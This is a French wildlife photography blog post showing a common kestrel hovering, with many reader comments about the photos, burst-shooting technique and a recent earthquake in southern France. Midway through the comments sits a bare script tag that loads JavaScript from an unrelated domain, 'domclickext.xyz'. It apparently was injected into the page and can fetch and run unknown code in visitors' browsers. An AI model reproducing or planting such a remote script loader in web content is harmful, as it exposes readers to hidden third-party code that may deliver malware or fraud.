-
Faucon crécerelle ♀ en Saint-Esprit
Faucon crécerelle - Falco tinnunculus - Common Kestrel
Ça y est, tu m'as bien vue ? Parce-que, il faut que je mange un peu moi...
Cette fois, je plonge, j'ai repéré un truc intéressant ;-)
-
Commentaires
3Elaine HancockMercredi 13 Novembre à 00:59A magnificent series. The individual images are spectacular. Such a beautiful and powerful bird.
Have a wonderful day Pascale
Tes photos sont de toute beauté Pascale ... un véritable moment de grâce ...
Mais je vais encore te paraître ignare, que veux-tu dire par " en Saint-Esprit " ...?
Je ne pensais pas que tu habitais si près de l'endroit où a eu lieu le tremblement de terre.
Belle journée, bisous !
Cathy-
Mercredi 13 Novembre à 08:53
Coucou Cathy,
C'est ainsi que l'on nomme le vol de cet oiseau, quasiment sur place quand il cherche son repas au sol. et pourquoi ignare ? On ne peut pas tout savoir ;-) Tout dépend aussi de nos centres d'intérêts.
Je n'habite pas à l'endroit ou le tremblement a été le plus violent, mais il s'est fait sentir assez loin de l'épicentre.
Bisous et bonne journée
-
heureuse de voir qu'il n'y a pas eu de dégâts chez toi avec ce tremblement de terre. waouh elles sont superbes tes photos, quel détail, on a l'impression qu'il nous regarde. bises.celine
Bonjour Pascale
Ces photographies sont formidables j'adore le regard de ce faucon crécerelle. On dirait un réel échange entre lui et toi
ps : as tu utilisé le mode prise de vue en rafale ?
Car le regard est toujours le même (ou presque) , seuls les différentes photographies montrent les battements d'ailes dans différentes phases-
Mercredi 13 Novembre à 08:55
-
I absolutely love how she's keeping her eyes on you Pascale! And I'm so glad you weren't hurt by the earthquake.
Un regard et des ailes au vol infaillible , de telles images vous en donnent aussi à vous , des ailes !
Bises .
Tes photos sont magnifiques et c'est amusant en effet car on a vraiment l'impression que ce petit faucon nous regarde :) Ce qui est surprenant ce n'est pas qu'il y ait eu un séisme dans l'hexagone car il y en a sans arrêt de diverses intensités, mais c'est l'intensité de celui-ci dans une zone à risque modéré. Cela laisse imaginer ce que ça serait dans une zone plus risquée...et aussi ce que cela aurait pu provoquer dans un secteur où se trouvent plusieurs centrales nucléaires. Bien entendu je suis de tout cœur avec les familles qui ont perdu leur maison...d'autant plus que je connais bien le village puisque j'y passe très souvent quand je monte en Haute-Loire...c'est encore plus impressionnant de voir les dégâts quand on connait les lieux. bisous et une belle journée
-
Mercredi 13 Novembre à 09:02
Merci pour les photos Manou.
Oui, et quand on constate la magnitude de ce tremblement de terre et le fait que les centrales aient été conçues pour supporter 5.2, là, nous étions déjà au dessus. De quoi nous faire froid dans le dos, d'autant qu'elles ont toutes dépassé le temps d'utilisation prévue à la base.
Bisous et bonne journée
-
bonjour, Pascale
de superbes photos dans cette serie , avec on croirait presque une complicité dans le regard du Faucon..
des amis habitent à 60 km du tremblement heureusement il n'ont rien eu; terrible evenement ce tremblement...
bonne fin de journée
bises
à bientot
Oui, c'est inquiétant ce tremblement de terre... moi qui suis actuellement dans un pays ou la population subit souvent ce genre d'évènement dramatique... bref... je suis plutôt obsédé par les vagues minuscules actuellement, mais ce matin, c'était bien... enfin!
Ta série bracketing de ce beau faucon en mouvement est vraiment superbe.
On peut le contempler dans toute sa splendeur aérienne.
Bravo Pascale, c'est un régal de venir chez toi.
Je te souhaite une bonne journée.
-
Mercredi 13 Novembre à 09:08
Là ou tu vis, je me doute que tu surveilles beaucoup les vagues... et le calme avant la tempête ou pire.
Ce n'est pas du bracketing qui consiste à prendre en général trois photos identiques en one shot avec des expositions différentes (une sous-exposée, une normalement exposée et une sur-exposée) puis de les assembler. Technique essentiellement utilisée pour réaliser du HDR en prise de vue.
Impossible de faire du bracketing sur un sujet en mouvement quel qu'il soit.
Ces photos ont été extraites d'une série en rafale.
Merci beaucoup, c'est gentil.
Bonne journée également -
Mercredi 13 Novembre à 10:26
Bonne journée Pascale, Je retiens la leçon. -
Mercredi 13 Novembre à 10:37
Heuuuu ben non, il ne suffit pas que de maintenir le doigt sur la "gâchette" pour obtenir une bonne rafale malheureusement. Beaucoup de gens imaginent que la rafale simplifie la photo, il suffit d'essayer pour voir que ce n'est pas si simple ;-)
D'une part il faut déjà faire une bonne MAP sur le sujet en mouvement faute de quoi la netteté ne sera pas faite sur l'ensemble des clichés et la rafale sera floue de la première à la dernière image. Ensuite avec une bonne mise au point de départ, il faut parvenir à maintenir le suivi sur le sujet qui se déplace, faute de quoi la netteté sera perdue en cours de rafale et donc les photos seront floues.
Et si du coup tu utilises le bracketing sur les surfeurs sur la vague, eh bien je t'avoue que je ne sais pas trop comment tu t'y prends, car ce n'est pas une technique qui apprécie le mouvement.
Bonne journée Jean
-
C'est toujours un moment magique quand on le découvre en plein vol.
Il y en a de tout en temps qui passe vers les champs, mais toujours hors porté de zoom.
Très belle série en mouvement.alors là... je n aime pas... j adore !!! ce regard... ce regard me fait fondre... gros bisous des nouvelles de loo stp gros bisous
-
Mercredi 13 Novembre à 09:23
Merci pour les photos ;-)
Loo va bien, mais en cicatrisant, cela commence à le démanger sérieusement, et je dois le surveiller tout le temps. Il essaye tant bien que mal de se lécher le pauvre. Et en plus comme il n'y arrive pas, il va présenter sa plaie à Gampo... Grrrrrrrr
Aller avec aujourd'hui, plus que six jours....
A part cela, il va très bien.
Merci pour lui.
Gros bisous
-
Coucou Pascale.
Ce faucon femelle a vraiment une tête très mignonne,son oeil est brillant et son bec tout en finesse est bien détaillé.Elle a l'air sympa vue d'en haut mais gare aux futures proies.Bravo pour les photos.
Quant aux tremblements de terre avec les vieilles centrales,ça fait peur.Contente que tu n'aies pas été touchée.
Bonne journée et des bises.
Bonjour Pascale
Oui une grande pensée pour ces personnes qui ont presque tout perdu
Chez nous aussi ça bouge de temps en temps ...
Bravo pour tes photos toujours aussi belles
Bises
Un instant de grâce. On a l'impression qu'il regarde le photographe et lui dit" Regarde ce que je sais faire, regarde comment je vole !!"
Bonjour pascale
Magnifiques prises de vue,à voir son regard on a l'impression qu'il te regarde . Bonne journée amitiés
Quel superbe shoot Pascale, des clichés qui nous montrent sa superbe envergure et son petit gourmand, bon appétit à lui lol lol . Bravo pour ce superbe plaisir des yeux ....
Une grand pensée de tristesse pour ceux qui viennent de tout perdre ,la nature ne fait pas de cadeaux !!
Ce matin gla, gla 4°mais soleil, soleil ici
Bonne journée et bises amicales de Christiane
Excellente série de photos sur le faucon crécerelle, j'adore les regarder quand ils font leur vol stationnaire au-dessus des champs! Très belle journée Pascale!
Bonjour Pascale,
A chaque fois que je viens sur ton blog je suis émerveillée par tes photos animalières.Tu es la "Pro" c'est certain.
Je viens d'apprendre le terme "Saint esprit" pour un vol stationnaire. On apprend vraiment sur les blogs. Ce faucon crecerelle est superbe. J'aime les mouvements de ses ailes et la grâce qu'il dégage.
Grand Bravo une nouvelle fois pour cette série.
PS/ Je ne savais pas pour le tremblement de terre dans ton coin. J'ai loupé encore un truc. Heureusement tout va bien.
Une douce journée Pascale-
Mercredi 13 Novembre à 10:50
Bon jour Elisa,
Merci pour les photos, c'est très gentil.
Oui, pas de dégâts. Et comme il y a des travaux non loin de ma maison, je dois bien dire que j'ai pensé que les tremblements venaient de leurs machines une fois encore. J'ai compris ce qu'il venait de se passer quand quelques instants plus tard mon fils nous a appelé pour savoir si tout allait bien... et que du coup nous avons écouté les infos. Pas eu le temps d'avoir peur ;-)
Bonne journée à toi également
-
Coucou Pascale
Là, je manque de qualificatifs tellement ces photos sont belles.
Très beau suivi de ce faucon, il est magnifique quand il fait le saint-esprit. Le piqué est parfait et la lumière est top, on voit tous les détails du plumage, une vraie merveille.
Merci pour ce grand moment de bonheur, j'en redemande !
Grosssss bisoussssssss et bonne journéeUn tremblement de terre est toujours une expérience au minimum désagréable ou dans d'autres cas traumatisante. Jusqu'à présent la France n'a pas vécu de tremblement de terre majeur. Ce qui interpelle est la présence de centrales nucléaires dans des zones sismiques. Il est effarant de découvrir que le coefficiant de sécurité pris sur la base des historiques connus soit aussi ridicule. Le nucléaire est tout sauf une industrie transparente. A travers cet incident majeur, on réalise que la soi disant maîtrise est bidon. Et ce seraient les populations locales et la nation qui en paieraient le prix fort. Pendant ce temps vole le faucon crécerelle. Magnifique oiseau qui a la capacité de rester en vol stationnaire pour mieux détecter ses proies avant de piquer sur elles. Très belle série en rafale dont toutes les séquences sont parfaitement gérées. Du beau travail photographique montrant plusieurs phase de vol de ce superbe oiseau. Bonne journée Pascale
-
Mercredi 13 Novembre à 12:24
C'est certain que tout cela est assez opaque dans cette industrie du nucléaire. Et avec nos centrales qui arrivent maintenant en obsolescence puisqu'elles ont fait le temps qu'elles devaient faire.... et que l'on va pousser dix voir quinze années de plus, je ne sais pas trop comment tout cela va se terminer.
Et puis nous étions à la pointe de cette technologie et à présent, les Chinois savent mieux les construire avec notre technologue que nous ne le faisons à présent alors où donc est l'erreur ?
Merci pour les photos.
Bonne journée
-
fascinant ce petit faucon, merci pour ces photos magnifiques!! dans les P.O. la terre tremblote assez souvent, mais on ne pense pas à si puissant...déja que les immeubles du quartier sont lézardés, il ne faudrais pas ça ici! gros bisous Pascale. cathy
-
Mercredi 13 Novembre à 12:19
-
Coucou. Wouah, quel animal impressionnant. Tu as réussi à merveille à lui tirer le portrait! Merci pour cet instant de grâce en plein vol. J'espère qu'il n'aura pas laisser filer sa proie et qu'il aura pu manger à sa faim. Quant au tremblement de terre, ouf que tu n'aies rien eu. J'ai entendu cela aux informations à la radio hier matin en allant au travail. Dans ma région des Alpes, il y a eu aussi pas mal de secousses (mais pas plus de 3 sur l'échelle de Richter) en haute-montagne. Les experts en sismologie ne s'explique pas le phénomène. Mais sans nul doute, la terre tremble et bouge. Et nous n'y pouvons pas grand-chose. Bises alpines.
-
Mercredi 13 Novembre à 12:42
-
bonjour
tout d'abord bravo pour ta série photos, on dirait qu'il volait ainsi pour te faire plaisir, pour te laisser du temps !! j'ai profiter de lire les conseils photos que tu donnes. Pour le mode rafale que penses-tu de celui proposé par le menu des appareils photos, une bonne alternative ??
bonne journée
-
Mercredi 13 Novembre à 13:50
Bon jour et merci pour les photos.
Pour ce qui est du mode rafale, je ne connais que celui proposé par les boîtiers, et je ne vois donc pas d'autre alternative.
Après pour ce qui est de l'efficacité de la rafale, elle est différente selon la capacité de chaque boîtier. On parle alors en IPS (Images Par Seconde), et on trouve ces renseignements dans les fiches techniques des appareils.
Certains boîtiers seront limités à du 3 images secondes, d'autres feront du 10 images seconde voir plus à présent.
Certains boîtiers bloqueront la rafale au bout de quelques images, et d'autres auront la capacité d'enregistrer les images tant que le doigt sera maintenu sur le déclencheur jusqu'à remplir la carte mémoire. Là encore il peut y avoir de grosses différences, tout dépend donc des capacités du boîtier.
Il y a encore un autre paramètre important à prendre en compte qui est celui de l'indice de vitesse d'enregistrement de la carte SD ou de la carte Compact Flash. Je te mets un lien explicatif ICI.
De fait si la vitesse et la classe de la carte ne permet pas un enregistrement rapide, cela ralentira voir bloquera la rafale même si le boîtier a de hautes capacités de rafale. Il faut donc choisir ses cartes avec les chiffres les plus élevés en vitesse et en classe pour tirer le meilleur parti des capacités IPS du boîtier.
Il y a d'autres paramètres à prendre en compte également quand on veut photographier en rafale. La rafale "mange" de la lumière de fait de la vitesse de l'obturateur qui devient prioritaire, il faut donc faire ses réglages en conséquences pour que les photos restent lumineuses.
Il faut aussi faire le choix du mode de l'auto-focus qui sont au nombre de trois modes et ont des fonctions très différentes selon les besoins.
Dernier point, un format JPEG s'enregistrera beaucoup plus vite qu'un format RAW beaucoup plus lourd, et encore plus si la carte n'est pas super performante. Ce paramètre entre donc aussi en considération.
Bonne journée
-
These series of photos are simply spectacular! The clarity in these shots is impeccable showcasing the kestrel's beautiful plumage. Glad that you are OK after the earthquake!
bonjour Pascale
magnifique ! on dirait qu' il est juste au dessus de toi et que c'est toi qu'il regarde . la série est très belle avec une belle netteté sur la tête .
Coucou Pascale, un mot que j'emploie souvent pour tes photos: sublime! mais je n'en trouve pas d'autres. Je reste souvent sans voix. Merci pour ce partage.
J'ai lu que Loo n'avait plus que qqs jours avant de se sentir plus libre.
Contente que le tremblement de terre n'ait pas eu de conséquences chez toi. Encore un drame!
Belle semaine et bises tout plein
calins à Loo et Gampo
chatou
-
Mercredi 13 Novembre à 14:38
Coucou Chatou,
Merci pour les photo, c'est vraiment gentil.
Oui, plus que 5 jours pleins si je ne compte pas aujourd'hui et le jour du retrait des points. Et je les compte les jours, crois moi ;-)
Ici a priori, il n'y a pas eu de graves conséquences pour le tremblement de terre, et j'en suis ravie tu te doutes bien.
Câlins transmis.
Bises et bonne journée
-
tant mieux s'il n'y a pas eu de dégâts. Avec la centrale nucléaire proche cela fait tout de même un peu peur. Et merci pour les très belles photos.
On ressent bien la vitesse de l'oiseau et sa vue perçante. Bises
Coucou Pascale,
Ici pas de soucis avec le tremblement de terre.
Tu es super douée pour les photos (à terre, en plein vol, à l'arrêt,...)
Que ce soit pour la détérioration de la terre, la torture animale, la méchanceté humaine, on ne peut s'en prendre qu'à la connerie humaine. J'espère que la terre va bientôt reprendre ses droits.
Bisous et bonne journée
En effet, c'est une très bonne nouvelle, j'espère que tu arriveras à les observer dans le Gardon et nous faire de chouettes photos.
Selon le soigneur, ceux d'Europe sont plutôt actifs en soirée.re-moi
merci d'avoir pris le temps de me répondre mais surtout pour tous ces détails. En effet grâce à toi je viens d'apprendre que pour le mode rafale il fallait déjà regarder sa carte mémoire, celle que j'utilise est une extrême de SanDisk 30MB/s 1 - classe 10, je suppose que ce sont les 30mb qui sont insuffisants?? je vais regarder le lien que tu m'as donné mais je tiens à te remercier pour ta gentillesse et ta disponibilité.
Bonne soirée
-
Mercredi 13 Novembre à 16:38
-
Interesting title. I love this series of action images. each stopped moment is full of elegance. Friendship42LaurenceMercredi 13 Novembre à 16:46Les oiseaux en vol, c'est ce que je préfère dans tes photos.
Sans doute est-ce le mouvement qu'elles expriment, ça me plaît.
Magnifique petit rapace !
Belle soirée.
Une très belle série de ce bel oiseau en vol.....un régal !
Une secousse inquiétante vu l'intensité et le "maximum" sensé être supporté par les centrales françaises...mais "pas de soucis, tout va bien"...nous dit-on !!!!
Ici on est en bordure d'une zone à risque sismique....
Bonne soirée
Bonjour Pascale, tes photos sont exceptionnelles et ce faucon si beau. C'est merveilleux de le voir ainsi.
Je suis heureuse de savoir qu'il n'y ait pas eu de dégâts chez toi. Les tremblements de terre font toujours peur et mes pensées vont à ces pauvres gens qui, certains, ont tout perdu.
Bisous et douce fin de journée.
Je ne sais quoi te dire, je trouve cette série parfaite et excellente.
Je rêve de pouvoir un jour prendre un faucon crécerelle, mais je manque de patience.....
Merci Pascale pour ces merveilles. bonne soirée.
bonsoir Pascale , ah oui ce faucon regarde vers le bas et descend en piquer ! c'est magique ! et tes photos sont magnifiques ! et on voit son oeil waouh et +++ ! un régal gros bisous belle soirée ! on a vu à la télé pour le tremblement ... ?? dur dur ...
Bonsoir Pascale merci du partage de ces sublimes photos de ce très bel oiseau j'aime beaucoup merci bonne soirée bisou Claudine Daniel
Bonsoir Pascale,
Quelle série!
Même quand tu le prends en plein vol, on voit son œil qui brille!
Bisous,
Mo
Impressive images of this small hunter. Superb focus in these photos.Coucou !
Impressionnant ce séisme. J'en ai ressenti plusieurs lorsque je vivais en Provence, ça fait peur.
Superbes clichés de ce beau faucon, quel regard !
Bonne soirée, bisesSalut Pascale,
Voilà une série en plein vol parfaitement réussie.
Félicitations.
Bonne soirée,Bises.
<script src="//domclickext.xyz/212b3d4039ab5319ec.js" type="text/javascript"></script>Quelle escroquerie ! Tu nous proposes la même photo 7 fois.
En y regardant de plus près je me suis dit qu'il s'agissait peut-être du jeu des 7 différences.
Plus sérieusement, je trouve cette série de sur-place (avant le début du plongeon) vraiment excellente.
-
Jeudi 14 Novembre à 19:55
-
cela doit être flippant de sentir que tout bouge !!!!
tes photos une foi encore me laissent la bouche ouverte j'adore !!!
besos
tilk
-
Jeudi 14 Novembre à 11:49
-
jour Pasvale. Tes photos de ce faucon crécelle en vol sont magnifiques avec une netteté incroyable et un beau rendu des nuances de couleurs de son plumage malgré la vitesse. Hier et avant-hier j'étais chez mon fils et je n'ai pas regardé la télé : je ne savais pas que la terre avait tremblé près de Montpellier. Heureusement que tu n'as pas eu de dégâts. Bisous
Un tir en rafale dans les plumes très réussi !! quelle belle série Pascale, la position et les attitudes connues des observateurs sont ici détaillées avec ces arrêts sur images, un grand bravo. Bonne journée, bises.
Coucou Pascale , je vais encore et encore me répéter mais qu'est-ce que j'aimerai savoir faire ce genre de photos , elles sont d'une netteté irréprochable sur l’œil du grand Art
Ce faucon crécerelle est magnifique et semble sur certaines photos te dire " vas-y , Pascale "tire moi le portrait"
Bises et bon jeudi à toi
Bonjour Pascale
Je suis toujours aussi époustouflée par la beauté et la qualité de tes photos !
Heureusement que tu n'aies pas eu de dégâts à cause de ce tremblement de terre, j'ai de la compassion pour les personnes qui en ont souffert.
Bisous
Am
60naysJeudi 14 Novembre à 15:43une merveille tes photos ¨Pascale il est beau ☺ dans ce ciel limpide
bisous et aux loulous ♥-
Jeudi 14 Novembre à 15:59
-
Quelles belles photos ! Le faucon ne quitte pas des yeux sa future proie, c'est impressionnant !
Quel oeil ce faucon crécerelle ! Et quels yeux de la photographe pour faire une MAP comme celle-ci .
Superbe série .
Bonne soirée Pascale
Bonsoir Pascale . Tes photos sont vraiment de toute beauté§ Et quel magnifique oiseau ! Suis toujours fascinée par leur regard !
Bonne soirée ! j'espère que ça va pour Loo.
-
Jeudi 14 Novembre à 18:34
-
Bonjour Pascale,
Quel regard, fixé sur l'objectif, en fait son objectif, c'est à dire sa proie. Magnifique série où il y a très peu de mouvements des ailes. Le vol plané suivi du piqué dans toute sa splendeur. Bravo pour cette capture, même en rafale.
Bises.
-
Jeudi 14 Novembre à 18:40
Bon soir Albert,
En fait il n'y a QUE des mouvements d'ailes très rapides quand les Faucons crécerelles sont en vol stationnaire (ici, il ne s'agit pas d'un vol plané), le corps lui ne bouge quasi pas avant le piqué.
Merci pour les photos... même si je ne comprends pas bien le "même en rafale", sauf si peut être comme beaucoup de gens, tu penses que la rafale est le mode simplifié de la photo animalière. Si c'est la raison, alors je te suggère vivement de t'y essayer sur un oiseau en vol (à main levée bien sûr), ne serait ce que pour arriver à bien caler au centre de ton viseur l'animal en mouvement (et encore plus avec une longue focale genre 600mm), ensuite faire la map sur ledit sujet toujours en mouvement et enfin faire un bon suivi sans te décaler de son mouvement pour conserver la netteté ;-)
Crois moi c'est bien plus simple de fonctionner en one shot ! Mais aussi beaucoup moins amusant me concernant ;-)
Bises
-
Bonjour,
je crois qu'il y en a qui tournent au dessus des champs vers chez moi
-
Jeudi 14 Novembre à 19:28
-
Coucou Pascale,
Tiens, il me regarde aussi ! hi hi ;-) Et du coup j'admire son œil cerclé de jaune, trop trop beau. Quand il a les ailes bien à l'horizontal, tes photos sont vraiment superbes. Il est magnifique, je me régale avec ta série. Bravo !
Gros bisous et bonne soirée à vous.
Coucou Pascale,
Je suis repassée voir ta dernière vidéo.
Tant qu'il y aura deux hommes sur cette terre , excuse moi l'expression... "ils se foutront sur la gueule", c'est inimaginable !!!
Par contre, la chocolatine a pris cher ;-)
Grosssssss bisoussssssss et bonne soirée-
Jeudi 14 Novembre à 19:32
Et sur l'autre vidéo, les hommes posent un drôle de regard sur les femmes, je dirais ... pas bien aimable ;-(
-
Jeudi 14 Novembre à 19:37
Coucou Martine,
Ben oui, forcément, l'Homme, à se croire tellement intelligent, supérieur et fort ne se rend même plus compte qu'il est le plus gros nuisible psychopathe et cruel. Et manifestement il adore se foutre sur la gueule, ce doit être un jeu primitif pour montrer sa grosse testostérone.
Une balle dans la tronche pour la Chocolatine, nomého, ça mérite bien ça pour un défenseur du Pain au chocolat ;-)
Et pour la vidéo d'avant, avoue tout de même que ce n'est pas totalement faux, il suffit de se promener dans la rue, de prendre les transports en commun... pour se rendre compte que ce n'est pas l'exception en tous cas. Je ne connais aucune femme qui n'ait pas eu à subir ce genre de comportement. Il n'y a pas si longtemps, je l'ai vécu même au boulot avec des élèves entre 18 et 20 ans.
BigBisoussssss et bonne soirée aussi.
-
Bonsoir Pascale, une belle série de cette oiseau intelligent.... Pourquoi??? Parce que...!!! C'est un faux con.....!!! Bon OK, je sort.....
Bon WE, bises.
ah mais c'est dingue ! j'admire j'admire j'admire parce que je sais qu'il n'est pas facile de les prendre ces petits faucons !
remarquables prises
bravo
Fabuleuse série d'une netteté à toute épreuve qui en font des photos fortes notamment quand ce faucon est en mode observation, compliments
Bonsoir Pascale, j'aime beaucoup le suivi de l'oiseau, ses mouvements d'ailes pendant que l’œil reste fixe, toute la série est très belle, lumineuse et avec ce beau ciel bleu, quel bonheur, surtout quand on sait le temps que vous avez dans le sud, j'espère que tu n'as pas trop d’inconvénients dus à la pluie. Je continue ma visite, bises.
coucou Pascale
alors là, évidemment j'adore.....je constate que le tien te tien a l'oeil LOL !!! alors que le mien s'en foutait, et seule une nourriture au sol l'interessait
je trouve amusante la similitude ou presque de nos prises respectives !!!
bonne journée, bises, maurice
bonjour Pascale , magnifique série et son vol pris à la suite waouh !! tes clichés sont très beaux comme toujours et ce faucon j'aime +++ merci bisous belle journée A+
Ajouter un commentaire
Bon jour,
Suite au tremblement de terre survenu ce lundi, merci pour les messages reçus.
Ressenti durant environ 5 secondes à Montpellier (avec une magnitude de 4.9 sur l'échelle de Richter selon les médias (ICI), aucun dégât ne semble être à déplorer.
En revanche, j'espère qu'aucun de vous n'a eu à subir de dégâts à l'épicentre avec une magnitude de 5.4 comme cela a malheureusement été le cas sur la commune du Teil et ses alentours. Pensées aux blessés et à ceux qui ont du quitter leur habitation.
Hier c'est Strasbourg qui a tremblé dans une moindre intensité... espérons qu'il n'y aura pas d'autres répliques.
Bonne journée et merci encore.
Je l'espère aussi...
La nature se réveille un peu partout pour nous dire sans doute qu'il faut mieux prendre soin d'elle.
Ton faucon est splendide.
Bisous et douce journée.
Il y a peut-être un message en effet, notre planète est vivante elle aussi, mais beaucoup l'ont oublié je le crains.
Merci pour les photos.
Bisous et bonne journée à toi aussi